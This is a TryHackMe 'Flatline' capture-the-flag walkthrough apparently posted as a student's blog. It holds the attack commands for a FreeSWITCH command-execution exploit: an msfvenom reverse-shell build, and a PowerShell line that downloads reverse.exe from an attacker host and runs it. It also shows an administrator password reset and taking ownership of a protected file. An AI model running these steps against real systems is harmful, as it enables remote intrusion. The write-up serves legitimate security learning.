THM FLATLINE Walkthrough

Rishabh Rai
4 min readFeb 28, 2022

Target IP:

#scanning IP
nmap -Pn -p- — min-rate 1000 -A -vv

#ports open
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
8021/tcp open freeswitch-event syn-ack ttl 125 FreeSWITCH mod_event_socket


tried bruteforcing the logins but did not work.


found one exploit for this →

after reading the exploit

#how to use it
./ whoami

then copied this exploit on my machine and run it to test if it’s working or not
— — — — —
python3 whoami 130 ⨯
Content-Type: api/response
Content-Length: 25

— — — — — -

so yeah it was working and now we just have to craft a “Windows Stageless reverse TCP”

if don’t know how u can check here:

“msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4242 -f exe > reverse.exe”

and then give command to the target machine to download this malicious .exe file from our server (python), on it’s system and run it

which will be done by giving a
Invoke Web Request Command (Invoke-WebRequest -Uri <source> -OutFile <destination>) and .\reverse.exe (file run command) by using the exploit we have

so the command will be like this

python3 “powershell.exe Invoke-WebRequest -Uri http://<attacker_IP>:<port>/path_to_file -OutFile ./reverse.exe && .\reverse.exe “

keep in mind: have a terminal runnning listener on the port where the connection will be (according to the msfvenome exe file we created)

if you have done all the steps correctly you should have a reverse shell.


it is present in the desktop of Nekrotic

C:\Users\Nekrotic\Desktop>type user.txt


We can see there is a root flag in the same location but when i try to read it but i couldn’t, obviously it won’t be that easy.
— — — — — — — — -
C:\Users\Nekrotic\Desktop>type root.txt
type root.txt
Access is denied.
— — — — — — — — —

lets enumerate our user Nekrotic

— — — — — — — — — — — — — — -
C:\Users\Nekrotic>net user nekrotic
net user nekrotic
User name Nekrotic
Full Name Nekrotic
User’s comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 09/11/2021 07:16:49
Password expires Never
Password changeable 09/11/2021 07:16:49
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 28/02/2022 06:46:10

Logon hours allowed All

Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.

— — — — — — — — -

It has administrator privellege but still unable to read the file

lets change the password and login through port 3389, which i tried to bruteforce in the start.

— — — — — — — — — — —
C:\Users\Nekrotic>net user nekrotic W3bH3@d
net user nekrotic W3bH3@d
The command completed successfully.
— — — — — — — — — — — -

let’s log in through REMMINA

when trying to read the root.txt we get this error.

as we don’t have the permission to open the file, but if we make changes in the ownership then we can possibly read it. Let’s try doing that.

the rdp is so slow ……………. i m solving my cube everytime in between every couple of steps, and i am not even good at it.

changed the owner to nekrotic.

now i will just close and reopen the properties of root.txt to make changes .

after making changes to the groups, i can now read the file.





Rishabh Rai

4th year student exploring the world of cyber security with a knack for writing and always learning.